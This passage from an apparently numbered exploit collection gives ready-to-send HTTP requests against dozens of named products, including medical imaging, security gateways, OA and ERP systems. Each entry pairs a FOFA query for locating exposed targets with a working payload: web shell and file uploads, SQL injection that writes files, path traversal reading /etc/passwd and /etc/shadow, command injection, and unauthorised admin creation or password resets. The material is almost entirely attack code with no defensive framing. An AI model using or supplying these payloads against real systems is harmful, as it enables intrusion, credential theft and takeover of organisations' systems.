Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical imaging archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 smart parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
FOFA: app="和丰山海-数字标牌"
POST /QH.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Connection: close
Content-Length: 583
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey
Accept-Encoding: gzip

------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"
Content-Type: application/octet-stream

<% response.write("ujidwqfuuqjalgkvrpqy") %>
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="action"

upload
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="responderId"

ResourceNewResponder
------WebKitFormBoundaryeegvclmyurlotuey
Content-Disposition: form-data; name="remotePath"

/opt/resources
------WebKitFormBoundaryeegvclmyurlotuey--

http://x.x.x.x/opt/resources/kjuhitjgk.aspx

163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
FOFA: icon_hash="-795291075"
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益 value management system DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体 佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical browsing system deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. Short video matrix marketing system poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下 Foreign Trade ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
    public bool IsReusable
    { get { return true; } }
    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

193. 山石网科 云鉴 Security Management System setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联 FE Enterprise Operations Management Platform uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 Internet Behavior Management System send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. Henan 风速科技 Unified Authentication Platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特 Customer Resource Management System Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 (aliyundrive-webdav) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit system assetsmanager_upload endpoint file upload

1. Run the PoC to obtain the CSRF token, then obtain a cookie, then upload and access the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, return value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to get a cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, return value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

FOFA:title="Authenticate Please!"
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) All-Media News Editing System binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

